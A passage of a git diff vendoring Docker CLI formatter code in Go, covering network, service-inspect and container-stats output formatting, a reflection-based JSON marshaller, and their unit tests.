} + return ctx.Write(&networkContext{}, render) +} + +type networkContext struct { + HeaderContext + trunc bool + n types.NetworkResource +} + +func (c *networkContext) MarshalJSON() ([]byte, error) { + return marshalJSON(c) +} + +func (c *networkContext) ID() string { + c.AddHeader(networkIDHeader) + if c.trunc { + return stringid.TruncateID(c.n.ID) + } + return c.n.ID +} + +func (c *networkContext) Name() string { + c.AddHeader(nameHeader) + return c.n.Name +} + +func (c *networkContext) Driver() string { + c.AddHeader(driverHeader) + return c.n.Driver +} + +func (c *networkContext) Scope() string { + c.AddHeader(scopeHeader) + return c.n.Scope +} + +func (c *networkContext) IPv6() string { + c.AddHeader(ipv6Header) + return fmt.Sprintf("%v", c.n.EnableIPv6) +} + +func (c *networkContext) Internal() string { + c.AddHeader(internalHeader) + return fmt.Sprintf("%v", c.n.Internal) +} + +func (c *networkContext) Labels() string { + c.AddHeader(labelsHeader) + if c.n.Labels == nil { + return "" + } + + var joinLabels []string + for k, v := range c.n.Labels { + joinLabels = append(joinLabels, fmt.Sprintf("%s=%s", k, v)) + } + return strings.Join(joinLabels, ",") +} + +func (c *networkContext) Label(name string) string { + n := strings.Split(name, ".") + r := strings.NewReplacer("-", " ", "_", " ") + h := r.Replace(n[len(n)-1]) + + c.AddHeader(h) + + if c.n.Labels == nil { + return "" + } + return c.n.Labels[name] +} diff --git a/vendor/github.com/docker/docker/cli/command/formatter/network_test.go b/vendor/github.com/docker/docker/cli/command/formatter/network_test.go new file mode 100644 index 0000000000..b40a534eed --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/formatter/network_test.go @@ -0,0 +1,208 @@ +package formatter + +import ( + "bytes" + "encoding/json" + "strings" + "testing" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/pkg/stringid" + "github.com/docker/docker/pkg/testutil/assert" +) + +func TestNetworkContext(t 
*testing.T) { + networkID := stringid.GenerateRandomID() + + var ctx networkContext + cases := []struct { + networkCtx networkContext + expValue string + expHeader string + call func() string + }{ + {networkContext{ + n: types.NetworkResource{ID: networkID}, + trunc: false, + }, networkID, networkIDHeader, ctx.ID}, + {networkContext{ + n: types.NetworkResource{ID: networkID}, + trunc: true, + }, stringid.TruncateID(networkID), networkIDHeader, ctx.ID}, + {networkContext{ + n: types.NetworkResource{Name: "network_name"}, + }, "network_name", nameHeader, ctx.Name}, + {networkContext{ + n: types.NetworkResource{Driver: "driver_name"}, + }, "driver_name", driverHeader, ctx.Driver}, + {networkContext{ + n: types.NetworkResource{EnableIPv6: true}, + }, "true", ipv6Header, ctx.IPv6}, + {networkContext{ + n: types.NetworkResource{EnableIPv6: false}, + }, "false", ipv6Header, ctx.IPv6}, + {networkContext{ + n: types.NetworkResource{Internal: true}, + }, "true", internalHeader, ctx.Internal}, + {networkContext{ + n: types.NetworkResource{Internal: false}, + }, "false", internalHeader, ctx.Internal}, + {networkContext{ + n: types.NetworkResource{}, + }, "", labelsHeader, ctx.Labels}, + {networkContext{ + n: types.NetworkResource{Labels: map[string]string{"label1": "value1", "label2": "value2"}}, + }, "label1=value1,label2=value2", labelsHeader, ctx.Labels}, + } + + for _, c := range cases { + ctx = c.networkCtx + v := c.call() + if strings.Contains(v, ",") { + compareMultipleValues(t, v, c.expValue) + } else if v != c.expValue { + t.Fatalf("Expected %s, was %s\n", c.expValue, v) + } + + h := ctx.FullHeader() + if h != c.expHeader { + t.Fatalf("Expected %s, was %s\n", c.expHeader, h) + } + } +} + +func TestNetworkContextWrite(t *testing.T) { + cases := []struct { + context Context + expected string + }{ + + // Errors + { + Context{Format: "{{InvalidFunction}}"}, + `Template parsing error: template: :1: function "InvalidFunction" not defined +`, + }, + { + Context{Format: 
"{{nil}}"}, + `Template parsing error: template: :1:2: executing "" at : nil is not a command +`, + }, + // Table format + { + Context{Format: NewNetworkFormat("table", false)}, + `NETWORK ID NAME DRIVER SCOPE +networkID1 foobar_baz foo local +networkID2 foobar_bar bar local +`, + }, + { + Context{Format: NewNetworkFormat("table", true)}, + `networkID1 +networkID2 +`, + }, + { + Context{Format: NewNetworkFormat("table {{.Name}}", false)}, + `NAME +foobar_baz +foobar_bar +`, + }, + { + Context{Format: NewNetworkFormat("table {{.Name}}", true)}, + `NAME +foobar_baz +foobar_bar +`, + }, + // Raw Format + { + Context{Format: NewNetworkFormat("raw", false)}, + `network_id: networkID1 +name: foobar_baz +driver: foo +scope: local + +network_id: networkID2 +name: foobar_bar +driver: bar +scope: local + +`, + }, + { + Context{Format: NewNetworkFormat("raw", true)}, + `network_id: networkID1 +network_id: networkID2 +`, + }, + // Custom Format + { + Context{Format: NewNetworkFormat("{{.Name}}", false)}, + `foobar_baz +foobar_bar +`, + }, + } + + for _, testcase := range cases { + networks := []types.NetworkResource{ + {ID: "networkID1", Name: "foobar_baz", Driver: "foo", Scope: "local"}, + {ID: "networkID2", Name: "foobar_bar", Driver: "bar", Scope: "local"}, + } + out := bytes.NewBufferString("") + testcase.context.Output = out + err := NetworkWrite(testcase.context, networks) + if err != nil { + assert.Error(t, err, testcase.expected) + } else { + assert.Equal(t, out.String(), testcase.expected) + } + } +} + +func TestNetworkContextWriteJSON(t *testing.T) { + networks := []types.NetworkResource{ + {ID: "networkID1", Name: "foobar_baz"}, + {ID: "networkID2", Name: "foobar_bar"}, + } + expectedJSONs := []map[string]interface{}{ + {"Driver": "", "ID": "networkID1", "IPv6": "false", "Internal": "false", "Labels": "", "Name": "foobar_baz", "Scope": ""}, + {"Driver": "", "ID": "networkID2", "IPv6": "false", "Internal": "false", "Labels": "", "Name": "foobar_bar", "Scope": ""}, + 
} + + out := bytes.NewBufferString("") + err := NetworkWrite(Context{Format: "{{json .}}", Output: out}, networks) + if err != nil { + t.Fatal(err) + } + for i, line := range strings.Split(strings.TrimSpace(out.String()), "\n") { + t.Logf("Output: line %d: %s", i, line) + var m map[string]interface{} + if err := json.Unmarshal([]byte(line), &m); err != nil { + t.Fatal(err) + } + assert.DeepEqual(t, m, expectedJSONs[i]) + } +} + +func TestNetworkContextWriteJSONField(t *testing.T) { + networks := []types.NetworkResource{ + {ID: "networkID1", Name: "foobar_baz"}, + {ID: "networkID2", Name: "foobar_bar"}, + } + out := bytes.NewBufferString("") + err := NetworkWrite(Context{Format: "{{json .ID}}", Output: out}, networks) + if err != nil { + t.Fatal(err) + } + for i, line := range strings.Split(strings.TrimSpace(out.String()), "\n") { + t.Logf("Output: line %d: %s", i, line) + var s string + if err := json.Unmarshal([]byte(line), &s); err != nil { + t.Fatal(err) + } + assert.Equal(t, s, networks[i].ID) + } +} diff --git a/vendor/github.com/docker/docker/cli/command/formatter/reflect.go b/vendor/github.com/docker/docker/cli/command/formatter/reflect.go new file mode 100644 index 0000000000..d1d8737d21 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/formatter/reflect.go @@ -0,0 +1,65 @@ +package formatter + +import ( + "encoding/json" + "fmt" + "reflect" + "unicode" +) + +func marshalJSON(x interface{}) ([]byte, error) { + m, err := marshalMap(x) + if err != nil { + return nil, err + } + return json.Marshal(m) +} + +// marshalMap marshals x to map[string]interface{} +func marshalMap(x interface{}) (map[string]interface{}, error) { + val := reflect.ValueOf(x) + if val.Kind() != reflect.Ptr { + return nil, fmt.Errorf("expected a pointer to a struct, got %v", val.Kind()) + } + if val.IsNil() { + return nil, fmt.Errorf("expxected a pointer to a struct, got nil pointer") + } + valElem := val.Elem() + if valElem.Kind() != reflect.Struct { + return nil, 
fmt.Errorf("expected a pointer to a struct, got a pointer to %v", valElem.Kind()) + } + typ := val.Type() + m := make(map[string]interface{}) + for i := 0; i < val.NumMethod(); i++ { + k, v, err := marshalForMethod(typ.Method(i), val.Method(i)) + if err != nil { + return nil, err + } + if k != "" { + m[k] = v + } + } + return m, nil +} + +var unmarshallableNames = map[string]struct{}{"FullHeader": {}} + +// marshalForMethod returns the map key and the map value for marshalling the method. +// It returns ("", nil, nil) for valid but non-marshallable parameter. (e.g. "unexportedFunc()") +func marshalForMethod(typ reflect.Method, val reflect.Value) (string, interface{}, error) { + if val.Kind() != reflect.Func { + return "", nil, fmt.Errorf("expected func, got %v", val.Kind()) + } + name, numIn, numOut := typ.Name, val.Type().NumIn(), val.Type().NumOut() + _, blackListed := unmarshallableNames[name] + // FIXME: In text/template, (numOut == 2) is marshallable, + // if the type of the second param is error. 
+ marshallable := unicode.IsUpper(rune(name[0])) && !blackListed && + numIn == 0 && numOut == 1 + if !marshallable { + return "", nil, nil + } + result := val.Call(make([]reflect.Value, numIn)) + intf := result[0].Interface() + return name, intf, nil +} diff --git a/vendor/github.com/docker/docker/cli/command/formatter/reflect_test.go b/vendor/github.com/docker/docker/cli/command/formatter/reflect_test.go new file mode 100644 index 0000000000..e547b18411 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/formatter/reflect_test.go @@ -0,0 +1,66 @@ +package formatter + +import ( + "reflect" + "testing" +) + +type dummy struct { +} + +func (d *dummy) Func1() string { + return "Func1" +} + +func (d *dummy) func2() string { + return "func2(should not be marshalled)" +} + +func (d *dummy) Func3() (string, int) { + return "Func3(should not be marshalled)", -42 +} + +func (d *dummy) Func4() int { + return 4 +} + +type dummyType string + +func (d *dummy) Func5() dummyType { + return dummyType("Func5") +} + +func (d *dummy) FullHeader() string { + return "FullHeader(should not be marshalled)" +} + +var dummyExpected = map[string]interface{}{ + "Func1": "Func1", + "Func4": 4, + "Func5": dummyType("Func5"), +} + +func TestMarshalMap(t *testing.T) { + d := dummy{} + m, err := marshalMap(&d) + if err != nil { + t.Fatal(err) + } + if !reflect.DeepEqual(dummyExpected, m) { + t.Fatalf("expected %+v, got %+v", + dummyExpected, m) + } +} + +func TestMarshalMapBad(t *testing.T) { + if _, err := marshalMap(nil); err == nil { + t.Fatal("expected an error (argument is nil)") + } + if _, err := marshalMap(dummy{}); err == nil { + t.Fatal("expected an error (argument is non-pointer)") + } + x := 42 + if _, err := marshalMap(&x); err == nil { + t.Fatal("expected an error (argument is a pointer to non-struct)") + } +} diff --git a/vendor/github.com/docker/docker/cli/command/formatter/service.go b/vendor/github.com/docker/docker/cli/command/formatter/service.go new file mode 
100644 index 0000000000..aaa78386cb --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/formatter/service.go @@ -0,0 +1,322 @@ +package formatter + +import ( + "fmt" + "strings" + "time" + + mounttypes "github.com/docker/docker/api/types/mount" + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/cli/command/inspect" + units "github.com/docker/go-units" +) + +const serviceInspectPrettyTemplate Format = ` +ID: {{.ID}} +Name: {{.Name}} +{{- if .Labels }} +Labels: +{{- range $k, $v := .Labels }} + {{ $k }}{{if $v }}={{ $v }}{{ end }} +{{- end }}{{ end }} +Service Mode: +{{- if .IsModeGlobal }} Global +{{- else if .IsModeReplicated }} Replicated +{{- if .ModeReplicatedReplicas }} + Replicas: {{ .ModeReplicatedReplicas }} +{{- end }}{{ end }} +{{- if .HasUpdateStatus }} +UpdateStatus: + State: {{ .UpdateStatusState }} + Started: {{ .UpdateStatusStarted }} +{{- if .UpdateIsCompleted }} + Completed: {{ .UpdateStatusCompleted }} +{{- end }} + Message: {{ .UpdateStatusMessage }} +{{- end }} +Placement: +{{- if .TaskPlacementConstraints -}} + Contraints: {{ .TaskPlacementConstraints }} +{{- end }} +{{- if .HasUpdateConfig }} +UpdateConfig: + Parallelism: {{ .UpdateParallelism }} +{{- if .HasUpdateDelay}} + Delay: {{ .UpdateDelay }} +{{- end }} + On failure: {{ .UpdateOnFailure }} +{{- if .HasUpdateMonitor}} + Monitoring Period: {{ .UpdateMonitor }} +{{- end }} + Max failure ratio: {{ .UpdateMaxFailureRatio }} +{{- end }} +ContainerSpec: + Image: {{ .ContainerImage }} +{{- if .ContainerArgs }} + Args: {{ range $arg := .ContainerArgs }}{{ $arg }} {{ end }} +{{- end -}} +{{- if .ContainerEnv }} + Env: {{ range $env := .ContainerEnv }}{{ $env }} {{ end }} +{{- end -}} +{{- if .ContainerWorkDir }} + Dir: {{ .ContainerWorkDir }} +{{- end -}} +{{- if .ContainerUser }} + User: {{ .ContainerUser }} +{{- end }} +{{- if .ContainerMounts }} +Mounts: +{{- end }} +{{- range $mount := .ContainerMounts }} + Target = {{ $mount.Target }} + Source = {{ 
$mount.Source }} + ReadOnly = {{ $mount.ReadOnly }} + Type = {{ $mount.Type }} +{{- end -}} +{{- if .HasResources }} +Resources: +{{- if .HasResourceReservations }} + Reservations: +{{- if gt .ResourceReservationNanoCPUs 0.0 }} + CPU: {{ .ResourceReservationNanoCPUs }} +{{- end }} +{{- if .ResourceReservationMemory }} + Memory: {{ .ResourceReservationMemory }} +{{- end }}{{ end }} +{{- if .HasResourceLimits }} + Limits: +{{- if gt .ResourceLimitsNanoCPUs 0.0 }} + CPU: {{ .ResourceLimitsNanoCPUs }} +{{- end }} +{{- if .ResourceLimitMemory }} + Memory: {{ .ResourceLimitMemory }} +{{- end }}{{ end }}{{ end }} +{{- if .Networks }} +Networks: +{{- range $network := .Networks }} {{ $network }}{{ end }} {{ end }} +Endpoint Mode: {{ .EndpointMode }} +{{- if .Ports }} +Ports: +{{- range $port := .Ports }} + PublishedPort {{ $port.PublishedPort }} + Protocol = {{ $port.Protocol }} + TargetPort = {{ $port.TargetPort }} +{{- end }} {{ end -}} +` + +// NewServiceFormat returns a Format for rendering using a Context +func NewServiceFormat(source string) Format { + switch source { + case PrettyFormatKey: + return serviceInspectPrettyTemplate + default: + return Format(strings.TrimPrefix(source, RawFormatKey)) + } +} + +// ServiceInspectWrite renders the context for a list of services +func ServiceInspectWrite(ctx Context, refs []string, getRef inspect.GetRefFunc) error { + if ctx.Format != serviceInspectPrettyTemplate { + return inspect.Inspect(ctx.Output, refs, string(ctx.Format), getRef) + } + render := func(format func(subContext subContext) error) error { + for _, ref := range refs { + serviceI, _, err := getRef(ref) + if err != nil { + return err + } + service, ok := serviceI.(swarm.Service) + if !ok { + return fmt.Errorf("got wrong object to inspect") + } + if err := format(&serviceInspectContext{Service: service}); err != nil { + return err + } + } + return nil + } + return ctx.Write(&serviceInspectContext{}, render) +} + +type serviceInspectContext struct { + 
swarm.Service + subContext +} + +func (ctx *serviceInspectContext) MarshalJSON() ([]byte, error) { + return marshalJSON(ctx) +} + +func (ctx *serviceInspectContext) ID() string { + return ctx.Service.ID +} + +func (ctx *serviceInspectContext) Name() string { + return ctx.Service.Spec.Name +} + +func (ctx *serviceInspectContext) Labels() map[string]string { + return ctx.Service.Spec.Labels +} + +func (ctx *serviceInspectContext) IsModeGlobal() bool { + return ctx.Service.Spec.Mode.Global != nil +} + +func (ctx *serviceInspectContext) IsModeReplicated() bool { + return ctx.Service.Spec.Mode.Replicated != nil +} + +func (ctx *serviceInspectContext) ModeReplicatedReplicas() *uint64 { + return ctx.Service.Spec.Mode.Replicated.Replicas +} + +func (ctx *serviceInspectContext) HasUpdateStatus() bool { + return ctx.Service.UpdateStatus.State != "" +} + +func (ctx *serviceInspectContext) UpdateStatusState() swarm.UpdateState { + return ctx.Service.UpdateStatus.State +} + +func (ctx *serviceInspectContext) UpdateStatusStarted() string { + return units.HumanDuration(time.Since(ctx.Service.UpdateStatus.StartedAt)) +} + +func (ctx *serviceInspectContext) UpdateIsCompleted() bool { + return ctx.Service.UpdateStatus.State == swarm.UpdateStateCompleted +} + +func (ctx *serviceInspectContext) UpdateStatusCompleted() string { + return units.HumanDuration(time.Since(ctx.Service.UpdateStatus.CompletedAt)) +} + +func (ctx *serviceInspectContext) UpdateStatusMessage() string { + return ctx.Service.UpdateStatus.Message +} + +func (ctx *serviceInspectContext) TaskPlacementConstraints() []string { + if ctx.Service.Spec.TaskTemplate.Placement != nil { + return ctx.Service.Spec.TaskTemplate.Placement.Constraints + } + return nil +} + +func (ctx *serviceInspectContext) HasUpdateConfig() bool { + return ctx.Service.Spec.UpdateConfig != nil +} + +func (ctx *serviceInspectContext) UpdateParallelism() uint64 { + return ctx.Service.Spec.UpdateConfig.Parallelism +} + +func (ctx 
*serviceInspectContext) HasUpdateDelay() bool { + return ctx.Service.Spec.UpdateConfig.Delay.Nanoseconds() > 0 +} + +func (ctx *serviceInspectContext) UpdateDelay() time.Duration { + return ctx.Service.Spec.UpdateConfig.Delay +} + +func (ctx *serviceInspectContext) UpdateOnFailure() string { + return ctx.Service.Spec.UpdateConfig.FailureAction +} + +func (ctx *serviceInspectContext) HasUpdateMonitor() bool { + return ctx.Service.Spec.UpdateConfig.Monitor.Nanoseconds() > 0 +} + +func (ctx *serviceInspectContext) UpdateMonitor() time.Duration { + return ctx.Service.Spec.UpdateConfig.Monitor +} + +func (ctx *serviceInspectContext) UpdateMaxFailureRatio() float32 { + return ctx.Service.Spec.UpdateConfig.MaxFailureRatio +} + +func (ctx *serviceInspectContext) ContainerImage() string { + return ctx.Service.Spec.TaskTemplate.ContainerSpec.Image +} + +func (ctx *serviceInspectContext) ContainerArgs() []string { + return ctx.Service.Spec.TaskTemplate.ContainerSpec.Args +} + +func (ctx *serviceInspectContext) ContainerEnv() []string { + return ctx.Service.Spec.TaskTemplate.ContainerSpec.Env +} + +func (ctx *serviceInspectContext) ContainerWorkDir() string { + return ctx.Service.Spec.TaskTemplate.ContainerSpec.Dir +} + +func (ctx *serviceInspectContext) ContainerUser() string { + return ctx.Service.Spec.TaskTemplate.ContainerSpec.User +} + +func (ctx *serviceInspectContext) ContainerMounts() []mounttypes.Mount { + return ctx.Service.Spec.TaskTemplate.ContainerSpec.Mounts +} + +func (ctx *serviceInspectContext) HasResources() bool { + return ctx.Service.Spec.TaskTemplate.Resources != nil +} + +func (ctx *serviceInspectContext) HasResourceReservations() bool { + if ctx.Service.Spec.TaskTemplate.Resources == nil || ctx.Service.Spec.TaskTemplate.Resources.Reservations == nil { + return false + } + return ctx.Service.Spec.TaskTemplate.Resources.Reservations.NanoCPUs > 0 || ctx.Service.Spec.TaskTemplate.Resources.Reservations.MemoryBytes > 0 +} + +func (ctx *serviceInspectContext) 
ResourceReservationNanoCPUs() float64 { + if ctx.Service.Spec.TaskTemplate.Resources.Reservations.NanoCPUs == 0 { + return float64(0) + } + return float64(ctx.Service.Spec.TaskTemplate.Resources.Reservations.NanoCPUs) / 1e9 +} + +func (ctx *serviceInspectContext) ResourceReservationMemory() string { + if ctx.Service.Spec.TaskTemplate.Resources.Reservations.MemoryBytes == 0 { + return "" + } + return units.BytesSize(float64(ctx.Service.Spec.TaskTemplate.Resources.Reservations.MemoryBytes)) +} + +func (ctx *serviceInspectContext) HasResourceLimits() bool { + if ctx.Service.Spec.TaskTemplate.Resources == nil || ctx.Service.Spec.TaskTemplate.Resources.Limits == nil { + return false + } + return ctx.Service.Spec.TaskTemplate.Resources.Limits.NanoCPUs > 0 || ctx.Service.Spec.TaskTemplate.Resources.Limits.MemoryBytes > 0 +} + +func (ctx *serviceInspectContext) ResourceLimitsNanoCPUs() float64 { + return float64(ctx.Service.Spec.TaskTemplate.Resources.Limits.NanoCPUs) / 1e9 +} + +func (ctx *serviceInspectContext) ResourceLimitMemory() string { + if ctx.Service.Spec.TaskTemplate.Resources.Limits.MemoryBytes == 0 { + return "" + } + return units.BytesSize(float64(ctx.Service.Spec.TaskTemplate.Resources.Limits.MemoryBytes)) +} + +func (ctx *serviceInspectContext) Networks() []string { + var out []string + for _, n := range ctx.Service.Spec.Networks { + out = append(out, n.Target) + } + return out +} + +func (ctx *serviceInspectContext) EndpointMode() string { + if ctx.Service.Spec.EndpointSpec == nil { + return "" + } + + return string(ctx.Service.Spec.EndpointSpec.Mode) +} + +func (ctx *serviceInspectContext) Ports() []swarm.PortConfig { + return ctx.Service.Endpoint.Ports +} diff --git a/vendor/github.com/docker/docker/cli/command/formatter/stats.go b/vendor/github.com/docker/docker/cli/command/formatter/stats.go new file mode 100644 index 0000000000..7997f996d8 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/formatter/stats.go @@ -0,0 +1,211 @@ +package 
formatter + +import ( + "fmt" + "sync" + + units "github.com/docker/go-units" +) + +const ( + winOSType = "windows" + defaultStatsTableFormat = "table {{.Container}}\t{{.CPUPerc}}\t{{.MemUsage}}\t{{.MemPerc}}\t{{.NetIO}}\t{{.BlockIO}}\t{{.PIDs}}" + winDefaultStatsTableFormat = "table {{.Container}}\t{{.CPUPerc}}\t{{.MemUsage}}\t{{.NetIO}}\t{{.BlockIO}}" + + containerHeader = "CONTAINER" + cpuPercHeader = "CPU %" + netIOHeader = "NET I/O" + blockIOHeader = "BLOCK I/O" + memPercHeader = "MEM %" // Used only on Linux + winMemUseHeader = "PRIV WORKING SET" // Used only on Windows + memUseHeader = "MEM USAGE / LIMIT" // Used only on Linux + pidsHeader = "PIDS" // Used only on Linux +) + +// StatsEntry represents represents the statistics data collected from a container +type StatsEntry struct { + Container string + Name string + ID string + CPUPercentage float64 + Memory float64 // On Windows this is the private working set + MemoryLimit float64 // Not used on Windows + MemoryPercentage float64 // Not used on Windows + NetworkRx float64 + NetworkTx float64 + BlockRead float64 + BlockWrite float64 + PidsCurrent uint64 // Not used on Windows + IsInvalid bool + OSType string +} + +// ContainerStats represents an entity to store containers statistics synchronously +type ContainerStats struct { + mutex sync.Mutex + StatsEntry + err error +} + +// GetError returns the container statistics error. +// This is used to determine whether the statistics are valid or not +func (cs *ContainerStats) GetError() error { + cs.mutex.Lock() + defer cs.mutex.Unlock() + return cs.err +} + +// SetErrorAndReset zeroes all the container statistics and store the error. 
+// It is used when receiving time out error during statistics collecting to reduce lock overhead +func (cs *ContainerStats) SetErrorAndReset(err error) { + cs.mutex.Lock() + defer cs.mutex.Unlock() + cs.CPUPercentage = 0 + cs.Memory = 0 + cs.MemoryPercentage = 0 + cs.MemoryLimit = 0 + cs.NetworkRx = 0 + cs.NetworkTx = 0 + cs.BlockRead = 0 + cs.BlockWrite = 0 + cs.PidsCurrent = 0 + cs.err = err + cs.IsInvalid = true +} + +// SetError sets container statistics error +func (cs *ContainerStats) SetError(err error) { + cs.mutex.Lock() + defer cs.mutex.Unlock() + cs.err = err + if err != nil { + cs.IsInvalid = true + } +} + +// SetStatistics set the container statistics +func (cs *ContainerStats) SetStatistics(s StatsEntry) { + cs.mutex.Lock() + defer cs.mutex.Unlock() + s.Container = cs.Container + s.OSType = cs.OSType + cs.StatsEntry = s +} + +// GetStatistics returns container statistics with other meta data such as the container name +func (cs *ContainerStats) GetStatistics() StatsEntry { + cs.mutex.Lock() + defer cs.mutex.Unlock() + return cs.StatsEntry +} + +// NewStatsFormat returns a format for rendering an CStatsContext +func NewStatsFormat(source, osType string) Format { + if source == TableFormatKey { + if osType == winOSType { + return Format(winDefaultStatsTableFormat) + } + return Format(defaultStatsTableFormat) + } + return Format(source) +} + +// NewContainerStats returns a new ContainerStats entity and sets in it the given name +func NewContainerStats(container, osType string) *ContainerStats { + return &ContainerStats{ + StatsEntry: StatsEntry{Container: container, OSType: osType}, + } +} + +// ContainerStatsWrite renders the context for a list of containers statistics +func ContainerStatsWrite(ctx Context, containerStats []StatsEntry) error { + render := func(format func(subContext subContext) error) error { + for _, cstats := range containerStats { + containerStatsCtx := &containerStatsContext{ + s: cstats, + } + if err := format(containerStatsCtx); 
err != nil { + return err + } + } + return nil + } + return ctx.Write(&containerStatsContext{}, render) +} + +type containerStatsContext struct { + HeaderContext + s StatsEntry +} + +func (c *containerStatsContext) Container() string { + c.AddHeader(containerHeader) + return c.s.Container +} + +func (c *containerStatsContext) Name() string { + c.AddHeader(nameHeader) + name := c.s.Name[1:] + return name +} + +func (c *containerStatsContext) ID() string { + c.AddHeader(containerIDHeader) + return c.s.ID +} + +func (c *containerStatsContext) CPUPerc() string { + c.AddHeader(cpuPercHeader) + if c.s.IsInvalid { + return fmt.Sprintf("--") + } + return fmt.Sprintf("%.2f%%", c.s.CPUPercentage) +} + +func (c *containerStatsContext) MemUsage() string { + header := memUseHeader + if c.s.OSType == winOSType { + header = winMemUseHeader + } + c.AddHeader(header) + if c.s.IsInvalid { + return fmt.Sprintf("-- / --") + } + if c.s.OSType == winOSType { + return fmt.Sprintf("%s", units.BytesSize(c.s.Memory)) + } + return fmt.Sprintf("%s / %s", units.BytesSize(c.s.Memory), units.BytesSize(c.s.MemoryLimit)) +} + +func (c *containerStatsContext) MemPerc() string { + header := memPercHeader + c.AddHeader(header) + if c.s.IsInvalid || c.s.OSType == winOSType { + return fmt.Sprintf("--") + } + return fmt.Sprintf("%.2f%%", c.s.MemoryPercentage) +} + +func (c *containerStatsContext) NetIO() string { + c.AddHeader(netIOHeader) + if c.s.IsInvalid { + return fmt.Sprintf("--") + } + return fmt.Sprintf("%s / %s", units.HumanSizeWithPrecision(c.s.NetworkRx, 3), units.HumanSizeWithPrecision(c.s.NetworkTx, 3)) +} + +func (c *containerStatsContext) BlockIO() string { + c.AddHeader(blockIOHeader) + if c.s.IsInvalid { + return fmt.Sprintf("--") + } + return fmt.Sprintf("%s / %s", units.HumanSizeWithPrecision(c.s.BlockRead, 3), units.HumanSizeWithPrecision(c.s.BlockWrite, 3)) +} + +func (c *containerStatsContext) PIDs() string { + c.AddHeader(pidsHeader) + if c.s.IsInvalid || c.s.OSType == winOSType { 
+ return fmt.Sprintf("--") + } + return fmt.Sprintf("%d", c.s.PidsCurrent) +} diff --git a/vendor/github.com/docker/docker/cli/command/formatter/stats_test.go b/vendor/github.com/docker/docker/cli/command/formatter/stats_test.go new file mode 100644 index 0000000000..d5a17cc70e --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/formatter/stats_test.go @@ -0,0 +1,228 @@ +package formatter + +import ( + "bytes" + "testing" + + "github.com/docker/docker/pkg/stringid" + "github.com/docker/docker/pkg/testutil/assert" +) + +func TestContainerStatsContext(t *testing.T) { + containerID := stringid.GenerateRandomID() + + var ctx containerStatsContext + tt := []struct { + stats StatsEntry + expValue string + expHeader string + call func() string + }{ + {StatsEntry{Container: containerID}, containerID, containerHeader, ctx.Container}, + {StatsEntry{CPUPercentage: 5.5}, "5.50%", cpuPercHeader, ctx.CPUPerc}, + {StatsEntry{CPUPercentage: 5.5, IsInvalid: true}, "--", cpuPercHeader, ctx.CPUPerc}, + {StatsEntry{NetworkRx: 0.31, NetworkTx: 12.3}, "0.31 B / 12.3 B", netIOHeader, ctx.NetIO}, + {StatsEntry{NetworkRx: 0.31, NetworkTx: 12.3, IsInvalid: true}, "--", netIOHeader, ctx.NetIO}, + {StatsEntry{BlockRead: 0.1, BlockWrite: 2.3}, "0.1 B / 2.3 B", blockIOHeader, ctx.BlockIO}, + {StatsEntry{BlockRead: 0.1, BlockWrite: 2.3, IsInvalid: true}, "--", blockIOHeader, ctx.BlockIO}, + {StatsEntry{MemoryPercentage: 10.2}, "10.20%", memPercHeader, ctx.MemPerc}, + {StatsEntry{MemoryPercentage: 10.2, IsInvalid: true}, "--", memPercHeader, ctx.MemPerc}, + {StatsEntry{MemoryPercentage: 10.2, OSType: "windows"}, "--", memPercHeader, ctx.MemPerc}, + {StatsEntry{Memory: 24, MemoryLimit: 30}, "24 B / 30 B", memUseHeader, ctx.MemUsage}, + {StatsEntry{Memory: 24, MemoryLimit: 30, IsInvalid: true}, "-- / --", memUseHeader, ctx.MemUsage}, + {StatsEntry{Memory: 24, MemoryLimit: 30, OSType: "windows"}, "24 B", winMemUseHeader, ctx.MemUsage}, + {StatsEntry{PidsCurrent: 10}, "10", pidsHeader, 
ctx.PIDs}, + {StatsEntry{PidsCurrent: 10, IsInvalid: true}, "--", pidsHeader, ctx.PIDs}, + {StatsEntry{PidsCurrent: 10, OSType: "windows"}, "--", pidsHeader, ctx.PIDs}, + } + + for _, te := range tt { + ctx = containerStatsContext{s: te.stats} + if v := te.call(); v != te.expValue { + t.Fatalf("Expected %q, got %q", te.expValue, v) + } + + h := ctx.FullHeader() + if h != te.expHeader { + t.Fatalf("Expected %q, got %q", te.expHeader, h) + } + } +} + +func TestContainerStatsContextWrite(t *testing.T) { + tt := []struct { + context Context + expected string + }{ + { + Context{Format: "{{InvalidFunction}}"}, + `Template parsing error: template: :1: function "InvalidFunction" not defined +`, + }, + { + Context{Format: "{{nil}}"}, + `Template parsing error: template: :1:2: executing "" at : nil is not a command +`, + }, + { + Context{Format: "table {{.MemUsage}}"}, + `MEM USAGE / LIMIT +20 B / 20 B +-- / -- +`, + }, + { + Context{Format: "{{.Container}} {{.CPUPerc}}"}, + `container1 20.00% +container2 -- +`, + }, + } + + for _, te := range tt { + stats := []StatsEntry{ + { + Container: "container1", + CPUPercentage: 20, + Memory: 20, + MemoryLimit: 20, + MemoryPercentage: 20, + NetworkRx: 20, + NetworkTx: 20, + BlockRead: 20, + BlockWrite: 20, + PidsCurrent: 2, + IsInvalid: false, + OSType: "linux", + }, + { + Container: "container2", + CPUPercentage: 30, + Memory: 30, + MemoryLimit: 30, + MemoryPercentage: 30, + NetworkRx: 30, + NetworkTx: 30, + BlockRead: 30, + BlockWrite: 30, + PidsCurrent: 3, + IsInvalid: true, + OSType: "linux", + }, + } + var out bytes.Buffer + te.context.Output = &out + err := ContainerStatsWrite(te.context, stats) + if err != nil { + assert.Error(t, err, te.expected) + } else { + assert.Equal(t, out.String(), te.expected) + } + } +} + +func TestContainerStatsContextWriteWindows(t *testing.T) { + tt := []struct { + context Context + expected string + }{ + { + Context{Format: "table {{.MemUsage}}"}, + `PRIV WORKING SET +20 B +-- / -- +`, + }, + { + 
